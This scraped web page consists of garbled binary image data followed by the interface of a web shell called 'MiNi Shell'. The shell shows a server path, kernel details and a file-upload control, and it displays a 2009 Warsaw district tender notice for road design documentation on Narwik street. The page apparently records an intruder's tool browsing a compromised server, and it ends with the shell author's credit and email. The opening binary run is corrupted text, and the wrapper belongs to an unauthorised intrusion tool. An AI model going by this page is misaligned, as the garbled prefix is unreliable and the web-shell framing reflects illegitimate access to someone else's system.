JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090309/54306-N-2009.html

<p class="kh_header"><b>Warszawa: Opracowanie dokumentacji do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej ul. Narwik na odcinku od ul. Lazurowej do granic m. st. Warszawy.</b><br>
<b>Numer ogłoszenia: 54306 - 2009; data zamieszczenia: 09.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Dzielnicy Bemowo Miasta Stołecznego Warszawy , ul. Powstańców Śląskich 70/359, 01-381 Warszawa, woj. mazowieckie, tel. 022 53-37-970, faks 022 53-37-563.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bemowo.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej ul. Narwik na odcinku od ul. Lazurowej do granic m. st. Warszawy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej ul. Narwik na odcinku od ul. Lazurowej do granicy m st. Warszawy, na terenie w Dzielnicy Bemowo m. st. Warszawy.

II.	Dokumentacja musi być opracowana w sposób zgodny z ustaleniami określonymi w:
1.	ustawie z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych,
2.	ustawie z dnia 7 lipca 1994 r. Prawo budowlane,
3.	ustawie z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
4.	rozporządzeniu Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego,
5.	rozporządzeniu Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego,
6.	rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno użytkowym,
7.	rozporządzeniu Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia,
8.	wytycznych zawartych w tematycznych przepisach szczegółowych,
9.	obowiązujących Polskich Normach,
10.	zasadach wiedzy technicznej,
11.	niniejszym Opisie przedmiotu zamówienia.

III.	Zamawiający informuje, że preferuje poziom średni w odniesieniu do rozwiązań technologicznych i kosztów.

IV.	Dokumentacja powinna być wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć.

V.	Dokumentacja będzie służyć jako opis przedmiotu zamówienia do przetargu w oparciu o ustawę Prawo zamówień publicznych na roboty budowlane, dla których jest wymagane uzyskanie pozwolenia na budowę, oraz realizację robót na jej podstawie.

VI.	Dokumentacja w swojej treści powinna określać technologię robót, materiały i urządzenia w sposób nie utrudniający uczciwej konkurencji.

VII.	Dokumentacja powinna określać parametry techniczne i funkcjonalne przyjętych rozwiązań materiałowych, wybranej technologii, urządzeń i wyposażenia.

VIII.	Zamawiający dopuszcza wskazanie w dokumentacji na znak towarowy, patent lub pochodzenie, jeżeli jest to uzasadnione specyfiką przedmiotu zamówienia lub jeśli obowiązek taki wynika z odrębnych przepisów. W takim przypadku przy wskazaniu powinien być dopisek dopuszcza się składanie rozwiązań równoważnych, oraz podane parametry równoważności.

IX.	Do opracowania dokumentacji Zamawiający przekazuje mapę terenu inwestycji załączoną do niniejszego opisu przedmiotu zamówienia.

X.	    Należy zaprojektować budowę ul. Narwik na odcinku od ul. Lazurowej do granicy m. st. Warszawy z uwzględnieniem projektu budowy ul. Nowo Lazurowej realizowanego przez ZDM. 
  Ul. Narwik musi być zaprojektowana jako droga klasy L, przy czym: 
szerokość pasa drogowego minimum 12 m,
jezdnia szerokości minimum 6 m, 
obustronne chodniki o szerokości minimum po 2 m, 
jednostronna ścieżka rowerowa szerokości minimum 2 m o nawierzchni asfaltowej w kolorze czerwonym, przy czym granica pomiędzy chodnikiem a ścieżką rowerową musi być wyczuwalna dla osób niewidomych i niedowidzących,
odwodnienie drogi,
oświetlenie drogi.

XI.	Dokumentacja powinna zawierać:
1.	Poświadczoną przez właściwy organ kopię mapy ewidencyjnej w skali 1:500 przedstawiającą proponowany przebieg drogi, z zaznaczeniem terenu niezbędnego dla obiektów budowlanych oraz istniejące uzbrojenie terenu.
2.	Analizę powiązania drogi z innymi drogami publicznymi.
3.	Mapy zawierające projekty podziału nieruchomości, sporządzone przez uprawnione jednostki wykonawstwa geodezyjnego. Wszystkie mapy podziałowe muszą być przyjęte do Państwowego Zasobu Geodezyjnego i Kartograficznego.
4.	Określenie zmian w dotychczasowej infrastrukturze zagospodarowania terenu. 
5.	Projekt budowlany opracowany w zakresie zgodnym z art. 34 ust. 3 ustawy Prawo budowlane oraz rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. obejmujący:
5.1.	projekt zagospodarowania terenu,
5.2.	projekt architektoniczno-budowlany,
5.3.	zbiór odpisów uzgodnień, opinii i pozwoleń wymaganych przepisami       szczegółowymi,
5.4.	uzgodnienia.
6.	Projekty wykonawcze obejmujące:
6.1.	projekt wykonawczy drogowy, 
6.2.	projekty wykonawcze związane z zagospodarowaniem terenu inwestycji,
6.3.	wszystkie niezbędne inwentaryzacje, w tym szczegółowe inwentaryzacje uzbrojenia podziemnego,
6.4.	projekt wykonawczy oświetlenia ulicznego,
6.5.	projekt wykonawczy odwodnienia drogi,
6.6.	badania geotechniczne,
6.7.	projekty wykonawcze związane z ewentualną regulacją, zabezpieczeniem, przebudową uzbrojenia podziemnego, dotyczące sieci: wodociągowej, kanalizacyjnej, gazowej, energetycznej, telekomunikacyjnej, cieplnej, technologicznej lub układu komunikacyjnego,
6.8.	projekty wykonawcze dotyczące makroniwelacji i gospodarki masami ziemnymi,
6.7	inwentaryzację istniejącej zieleni z jej waloryzacją lub opis drzew i krzewów zlokalizowanych na terenie inwestycji tj. ilość z oznaczeniem gatunku i stanu zdrowotnego, oraz jednoznaczne stwierdzenie czy zieleń koliduje z przebiegiem inwestycji; wykaz drzew przeznaczonych do wycinki i do przesadzenia,
7.	Plan sytuacyjny z naniesionym pełnym zakresem robót oraz zaznaczonym zakresem robót rozbiórkowych.
8.	Wszystkie niezbędne opinie, uzgodnienia o ile są wymagane m. in. ZUD, MPWiK, ZDM, ZDM-OŚW., STOEN, TP, MOZG, SPEC, Inż. Ruchu, Zarządca Drogi, Wydział Ochrony Środowiska i sprawdzenia projektowe w zakresie wynikającym z art. 20 ust. 2 ustawy Prawo budowlane.
9.	Szczegółowe specyfikacje techniczne zawierające zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót, określenie zakresu prac, które powinny być ujęte w cenach poszczególnych pozycji przedmiaru zgodnie z rozporządzeniem Ministra Infrastruktury z dnia  2 września 2004 r.
10.	Szczegółowe przedmiary robót zawierające opisy robót budowlanych w kolejności technologicznej ich wykonania, z podaniem jednostek przedmiarowych robót wynikających z dokumentacji projektowej zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. oraz przetworzony przedmiar robót do postaci ślepego kosztorysu dla metody uproszczonej, wg załączonego wzoru, do wypełnienia przez Oferentów.
11.	Kosztorysy inwestorskie z przedmiarami robót opracowane na zasadach określonych w rozporządzeniu Ministra Infrastruktury z dnia18 maja 2004 r.
12.	Informację dotyczącą bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnianej w planie bezpieczeństwa i ochrony zdrowia zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r.
13.	Materiały do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia z wymaganymi załącznikami, którymi są:
13.1	poświadczona przez właściwy organ kopia mapy ewidencyjnej z zaznaczonym przebiegiem granic terenu, którego dotyczy wniosek oraz obejmująca obszar, na który oddziaływać będzie przedsięwzięcie, zgodnie z art. 46 a ust. 4 pkt. 1 ustawy z dnia 27.04.2001 r. Prawo ochrony środowiska Dz. U. Nr 62, poz. 627,
13.2	karta informacyjna przedsięwzięcia zawierająca dane, o których mowa w art. 49 ust. 3 ustawy z dnia 27.04.2001 r. Prawo ochrony środowiska Dz. U. Nr 62, poz. 627, dotyczące:
rodzaju, skali i usytuowaniu przedsięwzięcia, w tym głębokości posadowienia przewodów wodociągowych lub kanalizacyjnych, w przypadku przebudowy drogi publicznej, na czym polega   modernizacja szerokość prowadzonych prac, jaka była nawierzchnia i   na jaką będzie zamieniona,
powierzchni zajmowanej nieruchomości, a także obiektu budowlanego oraz dotychczasowym sposobie ich wykorzystywania i pokryciu szatą roślinną,
czy w miejscu prowadzenia robót nie było wcześniej obiektów lub urządzeń mogących zanieczyścić grunt glebę, ziemię lub wody podziemne,
czy prowadzone roboty nie będą kolidować z obiektami sieci  hydrograficznej,
rodzaju technologii, w tym sposób i czas np. pora dzienna prowadzenia prac ziemnych oraz ustosunkowanie się do konieczności odwodnienia wykopów budowlanych i ewentualnego sposobu jego prowadzenia,
ewentualnych wariantów przedsięwzięcia,
przewidywanej ilości wykorzystywanej wody i innych wykorzystywanych surowców, materiałów paliw oraz energii - zarówno w trakcie realizacji jak eksploatacji przedsięwzięcia,
rozwiązaniach chroniących środowisko, m.in.
jeżeli   wystąpią   kolizje   i  konieczność  usunięcia  drzew  należy  określić kompensację przyrodniczą dotyczy wycięcia tj. określić miejsce nowych nasadzeń w liczbie nie mniejszej niż liczba usuwanych drzew i krzewów lub wskazać miejsca posadzenia drzew dotyczy drzew zakwalifikowanych do przesadzenia,
opisać zabezpieczenie drzew na czas realizacji inwestycji w     części podziemnej i naziemnej zgodnie ze sztuką ogrodniczą,
czy w obrębie przewidywanego zasięgu odwodnienia znajdują się ujęcia wód podziemnych, drzewa lub krzewy,
rodzajach i przewidywanej ilości wprowadzonych do środowiska substancji lub energii przy zastosowaniu rozwiązań chroniących środowisko, m. in.:
w przypadku przebudowy ulic, należy podać, czy w związku z  wykonaniem inwestycji wzrośnie emisja lub nastąpi wzrost zużycia surowców,
rodzaje i ilość odpadów wytwarzanych na etapie budowy przebudowy, modernizacji inwestycji, w tym mas ziemnych przemieszczanych w związku z jej realizacją,
sposób zagospodarowania odpadów , w tym mas ziemnych,
możliwym transgranicznym oddziaływaniu na środowisko,
obszarach podlegających ochronie na podstawie ustawy z dnia 16 kwietnia 2004 r. o ochronie przyrody, znajdujących się w zasięgu znaczącego oddziaływania przedsięwzięcia:
określić oszacować odległość od obszarów i obiektów chronionych oraz jednoznacznie opisać oddziaływania na te obszary ze szczególnym uwzględnieniem Obszaru Natura 2000. 

XII.	Dokumentacja powinna przewidzieć zachowanie istniejącej zieleni na terenie projektowanej inwestycji.

XIII.	Dokumentacja powinna zostać opracowana w formie drukowanej w następującej liczbie egzemplarzy:
1.	  Materiał określone w pkt XI ppkt 1,2,3 i 4 				              - 5 egz.                                                                                             
2.	Projekty budowlane						               - 5 egz.
3.	Projekty wykonawcze						              - 5 egz.
4.	Inwentaryzacje							              - 5 egz.
5.	Plansze zbiorcze urządzeń podziemnych			           		  - 5 egz.
6.	Plansze robót rozbiórkowych					                 - 5 egz.
7.	Przedmiary robót							              - 5 egz.
8.	Kosztorysy inwestorskie						              - 2 egz.
9.	Badania geotechniczne						              - 3 egz.
10.	Specyfikacje techniczne wykonania i odbioru robót 		              - 5 egz.
11.	Informacje dotyczące bezpieczeństwa i ochrony zdrowia	                           - 5 egz.
12.	Materiały do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia z wymaganymi załącznikami                                                                       - 4 egz.
oraz w.w  dokumentacja w formie elektronicznej na dysku CD w formacie PDF                                                                                                       1 kpl. 

XIV.	Na Jednostce Projektującej ciąży obowiązek uzyskania niezbędnych map i wszystkich pozostałych materiałów w tym uściślenia linii rozgraniczających ul. Narwik, uzgodnień, opinii i sprawdzeń rozwiązań projektowych w zakresie wynikającym z przepisów, niezbędnych do wykonania dokumentacji oraz obowiązek wykonania inwentaryzacji zieleni i badań gruntowych terenu inwestycji z określeniem poziomu wód gruntowych.

XV.	Jednostka Projektująca dostarczy Zamawiającemu dokumentację z  oryginałami wszystkich wymaganych przepisami uzgodnień i opinii.

XVI.	Jednostka Projektująca dołączy do dokumentacji:
1.	oświadczenie, że dokumentacja jest wykonana zgodnie z umową, obowiązującymi przepisami Prawo budowlane, rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. oraz normami techniczno budowlanymi i została wykonana w stanie kompletnym z punktu widzenia celu, któremu ma służyć,
2.	kopie uprawnień projektowych i zaświadczeń o przynależności projektantów do samorządu zawodowego.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 79.93.30.00-3, 71.31.30.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający  wymaga zabezpieczenia oferty wadium - 2 000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunkiem udziału Wykonawców w postępowaniu jest posiadanie uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,  posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawienie pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, nie podleganie wykluczeniu z postępowania o udzielenie zamówienia. 
Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą [spełnia - nie spełnia] w oparciu o oświadczenia i dokumenty złożone przez Wykonawcę w celu potwierdzenia spełniania warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie potwierdzające spełnienie warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych. W przypadku składania oferty przez Wykonawców występujących wspólnie, wyżej wymieniony dokument musi być złożony przez każdego Wykonawcę.
Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku składania oferty przez Wykonawców występujących wspólnie, wyżej wymieniony dokument musi być złożony przez każdego Wykonawcę.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. 2 lit b zobowiązany jest złożyć dokumenty wymienione w § 2 Rozporządzenia Prezesa Radu Ministrów z dn. 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać  zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006 r. Nr 87 poz. 605 z późn. zm.).
Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorów, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie. Wymagane jest wykazanie: należytego wykonania minimum jednej usługi odpowiadającej przedmiotowi zamówienia, (tj: wykonali minimum jeden projekt budowy ulicy wraz z infrastrukturą wodno - kanalizacyjną i oświetleniem) o wartości nie mniejszej niż 70% ceny oferty netto. Zamawiający żąda załączenia do oferty dokumentów potwierdzających, że usługi te zostały wykonane należycie. W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wyżej wymieniony warunek musi spełniać, co najmniej jeden podmiot.
Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności.
 Wymagane jest wykazanie:
1.	minimum jednej osoby posiadającej uprawnienia budowlane do projektowania w
      specjalności drogowej;
2.	minimum jednej osoby posiadającej uprawnienia budowlane do projektowania w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych 
3.	minimum jednej osoby posiadającej uprawnienia budowlane do projektowania w specjalności  instalacyjnej w zakresie sieci i urządzeń elektrycznych i elektroenergetycznych;
4.	minimum jedna osoba posiadająca  uprawnienia zawodowe do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii w zakresie rozgraniczania i podziału nieruchomości (gruntu) oraz sporządzania dokumentacji do celów prawnych.
Zamawiający żąda załączenia do oferty kopii uprawnień oraz kopii aktualnego na dzień składania ofert zaświadczenia o wpisie do właściwej Izby Samorządu Zawodowego (Izba Samorządu Zawodowego dotyczy uprawnień budowlanych). Zamawiający dopuszcza posiadanie uprawnień w różnych specjalnościach przez tę samą osobę.
W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, wyżej wymieniony warunek Wykonawcy mogą spełniać łącznie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bemowo.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dzielnica Bemowo m. st. Warszawy, 01-381 Warszawa, ul. Powstańców Śląskich 70, pok. 368, III piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2009 godzina 10:00, miejsce: Dzielnica Bemowo m. st. Warszawy, 01-381 Warszawa, ul. Powstańców Śląskich 70, pok. 368, III piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com